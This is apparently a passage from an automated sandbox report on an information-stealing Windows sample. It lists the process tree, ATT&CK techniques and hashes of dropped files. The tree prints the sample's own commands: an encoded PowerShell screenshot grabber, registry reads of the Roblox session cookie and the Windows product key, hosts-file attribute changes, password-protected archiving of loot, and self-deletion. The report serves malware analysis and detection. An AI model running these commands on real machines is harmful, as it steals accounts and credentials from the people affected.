    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4972
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\433fmkj3\433fmkj3.cmdline"
        5⤵
        
        PID:404
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6F44.tmp" "c:\Users\Admin\AppData\Local\Temp\433fmkj3\CSCAA70BA3620B44C2790E8821BA1CAE625.TMP"
        6⤵
        
        PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4520
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1448
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4568
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:852
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2144
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:656
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:240
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1184
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3960
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\ngd30.zip" *"
    3⤵
    PID:3656
  - - C:\Users\Admin\AppData\Local\Temp\_MEI32922\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI32922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\ngd30.zip" *
      4⤵
      Executes dropped EXE
      PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:5084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Criamnl-nuker.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4148
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d6d1b8bb34838ccf42d5f69e919b1612

SHA1
20e9df1f5dd5908ce1b537d158961e0b1674949e

SHA256
8a4e7eae00df2e789c958a38e78ac0b53f439afe2d5bfe8a81fb8c6e232b6491

SHA512
ff3ba5dc3cb548018747a315f098e01c5a6f8aee029223ef4080b3db76b0ecaa6a01a1c79e1434bdf2aa5b2ae66ec85d33e760064282411c7712fba890a0309d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c67441dfa09f61bca500bb43407c56b8

SHA1
5a56cf7cbeb48c109e2128c31b681fac3959157b

SHA256
63082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33

SHA512
325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12998e204d028e09f7c96485f2a67c56

SHA1
0b4d76ed0de8b3fe6a71d59611a2add6544f9338

SHA256
a96ffb4c4498edd682446ae2660baa8e95bf3e77f58b4c1b37024e13c4b98457

SHA512
62651c9ecec76bdcf20a84a041aecc9a7007932a52ed7cbda6151e5112a6b10ae79826e5ac413815f6a9f283f88defebb17f20dc6d04cc149b05d3b476feef36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e1fdd1b66d2fee9f6a052524d4ddca5

SHA1
0a9d0994559d1be2eecd8b0d6960540ca627bdb6

SHA256
4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

SHA512
5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\433fmkj3\433fmkj3.dll

Filesize
4KB

MD5
3fe5f4cf0d71036b8dda37203a9a814d

SHA1
b3d835f78925c08233add8b6deeb764ddcca7fb6

SHA256
f83ba6b89c4ccf8c1808d1a4f39c6b0dfa06d3a4de768297175408db5f7460ec

SHA512
10cc51e993b3061c2f40d651af1d7d01dd7340f2571160a4861f4bfc03dd2cecd1d8262ee03cc88b0fa3ef5883c6f24977cefec69b7687b0ac11139898a0e18d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6F44.tmp

Filesize
1KB

MD5
24ae13e6b5e8a8fd5b967b7bdec31ced

SHA1
4a0d9b644f2afddd7d4c94857eefd45c513e425a

SHA256
396bd9968502652a8af5d6580746b3649653a99e7f5abfda95cd473f64a0d737

SHA512
ed6cc9d160e629f129134477a4b1df05ac6a7f1ad37c17895be38c0ed9a33db8bcbdf59c6d6239585fecd34a015d86ef0f7d7ede2b677049059a13aabcdd1bf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_bz2.pyd

Filesize
46KB

MD5
0c13627f114f346604b0e8cbc03baf29

SHA1
bf77611d924df2c80aabcc3f70520d78408587a2

SHA256
df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

SHA512
c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_ctypes.pyd

Filesize
57KB

MD5
38fb83bd4febed211bd25e19e1cae555

SHA1
4541df6b69d0d52687edb12a878ae2cd44f82db6

SHA256
cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

SHA512
f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_decimal.pyd

Filesize
104KB

MD5
7ba541defe3739a888be466c999c9787

SHA1
ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac

SHA256
f90efa10d90d940cde48aafe02c13a0fc0a1f0be7f3714856b7a1435f5decf29

SHA512
9194a527a17a505d049161935432fa25ba154e1aee6306dee9054071f249c891f0ca7839de3a21d09b57fdc3f29ee7c4f08237b0dfffafa8f0078cfe464bed3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_hashlib.pyd

Filesize
33KB

MD5
596df8ada4b8bc4ae2c2e5bbb41a6c2e

SHA1
e814c2e2e874961a18d420c49d34b03c2b87d068

SHA256
54348cfbf95fd818d74014c16343d9134282d2cf238329eec2cda1e2591565ec

SHA512
e16aad5230e4af7437b19c3db373b1a0a0a84576b608b34430cced04ffc652c6fb5d8a1fe1d49ac623d8ae94c8735800c6b0a12c531dcdd012b05b5fd61dff2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_lzma.pyd

Filesize
84KB

MD5
8d9e1bb65a192c8446155a723c23d4c5

SHA1
ea02b1bf175b7ef89ba092720b3daa0c11bef0f0

SHA256
1549fe64b710818950aa9bf45d43fe278ce59f3b87b3497d2106ff793efa6cf7

SHA512
4d67306fe8334f772fe9d463cb4f874a8b56d1a4ad3825cff53cae4e22fa3e1adba982f4ea24785312b73d84a52d224dfb4577c1132613aa3ae050a990e4abdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_queue.pyd

Filesize
24KB

MD5
fbbbfbcdcf0a7c1611e27f4b3b71079e

SHA1
56888df9701f9faa86c03168adcd269192887b7b

SHA256
699c1f0f0387511ef543c0df7ef81a13a1cffde4ce4cd43a1baf47a893b99163

SHA512
0a5ba701653ce9755048ae7b0395a15fbb35509bef7c4b4fe7f11dc4934f3bd298bcddbf2a05b61f75f8eb44c4c41b3616f07f9944e0620b031cbe87a7443284

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_socket.pyd

Filesize
41KB

MD5
4351d7086e5221398b5b78906f4e84ac

SHA1
ba515a14ec1b076a6a3eab900df57f4f37be104d

SHA256
a0fa25eef91825797f01754b7d7cf5106e355cf21322e926632f90af01280abe

SHA512
a1bcf51e797ccae58a0b4cfe83546e5e11f8fc011ca3568578c42e20bd7a367a5e1fa4237fb57aa84936eec635337e457a61a2a4d6eca3e90e6dde18ae808025

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_sqlite3.pyd

Filesize
54KB

MD5
d678600c8af1eeeaa5d8c1d668190608

SHA1
080404040afc8b6e5206729dd2b9ee7cf2cb70bc

SHA256
d6960f4426c09a12488eb457e62506c49a58d62a1cb16fbc3ae66b260453c2ed

SHA512
8fd5f0fd5bd60c6531e1b4ad867f81da92d5d54674028755e5680fb6005e6444805003d55b6cbaf4cdad7b4b301cffab7b010229f6fd9d366405b8ade1af72d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_ssl.pyd

Filesize
60KB

MD5
156b1fa2f11c73ed25f63ee20e6e4b26

SHA1
36189a5cde36d31664acbd530575a793fc311384

SHA256
a9b5f6c7a94fb6bfaf82024f906465ff39f9849e4a72a98a9b03fc07bf26da51

SHA512
